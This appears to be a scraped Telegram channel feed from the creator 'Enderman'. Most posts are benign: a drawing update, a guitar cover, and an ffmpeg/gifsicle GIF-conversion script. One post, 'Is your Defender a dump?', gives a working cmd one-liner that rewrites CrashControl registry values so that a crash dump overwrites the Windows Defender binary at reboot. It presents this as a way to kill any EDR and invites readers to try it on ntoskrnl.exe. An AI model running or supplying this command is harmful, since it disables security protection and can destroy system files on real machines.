Enderman
This is how she looks
The comments asked me to make the outline uniform, and that actually looks significantly better
❤35😱2👎1
Enderman
Voice message
🎵 Fade to Black
This one is super beautiful, I enjoy playing that a lot. The verse riff looks easy, but it's actually pretty challenging. The ending is the most difficult part.
This one is super beautiful, I enjoy playing that a lot. The verse riff looks easy, but it's actually pretty challenging. The ending is the most difficult part.
👍3
🔥 Is your Defender a dump? Yes it is!
Security researcher sixtyvividtails uncovered a trick to destroy any EDR upon boot by overwriting it with a crash dump.
🔻 No system crash needed, only reboot.
🔻 Defender is just an example; works versus anything (try ntoskrnl.exe).
🔻 Dedicated dump is not the only bootside kill; at least 4 more distinct yet similar ways.
The code:
Security researcher sixtyvividtails uncovered a trick to destroy any EDR upon boot by overwriting it with a crash dump.
🔻 No system crash needed, only reboot.
🔻 Defender is just an example; works versus anything (try ntoskrnl.exe).
🔻 Dedicated dump is not the only bootside kill; at least 4 more distinct yet similar ways.
The code:
cmd /v/c "set R=reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /f /v&!R! CrashDumpEnabled /d 7 /t 4&!R! DumpFileSize /d 666 /t 4&for /f "delims=*" %i in ('sc qc WinDefend^|find "PATH_"')do (set t=%i&!R! DedicatedDumpFile /d !t:~29,-1!)"😱57❤8👍4🎉4
😎 ezgif.cmd
Since Telegram has a wide variety of GIFs I want to share with my friends on Discord and they're stored as videos, I decided to automate the process of using ezgif. FFMPEG and Gifsicle are required, they also need to be in PATH.
The source code:
A special treat for Linux fams:
Since Telegram has a wide variety of GIFs I want to share with my friends on Discord and they're stored as videos, I decided to automate the process of using ezgif. FFMPEG and Gifsicle are required, they also need to be in PATH.
The source code:
ffmpeg -i %1 -vf "fps=15,scale=512:-1:flags=lanczos,split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse" output.gif && gifsicle -O3 --lossy=80 output.gif -o output.gif
A special treat for Linux fams:
#!/bin/sh
input="$1"
ffmpeg -i "$input" -vf "fps=15,scale=512:-1:flags=lanczos,split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse" output.gif && gifsicle -O3 --lossy=80 output.gif -o output.gif
❤57👍7🎉6😱1😢1
Enderman
😎 ezgif.cmd Since Telegram has a wide variety of GIFs I want to share with my friends on Discord and they're stored as videos, I decided to automate the process of using ezgif. FFMPEG and Gifsicle are required, they also need to be in PATH. The source code:…
😂 We value your privacy
Another reason for you to learn FFMPEG and GIF optimization tools.
Another reason for you to learn FFMPEG and GIF optimization tools.
👍54😱19❤7🤔1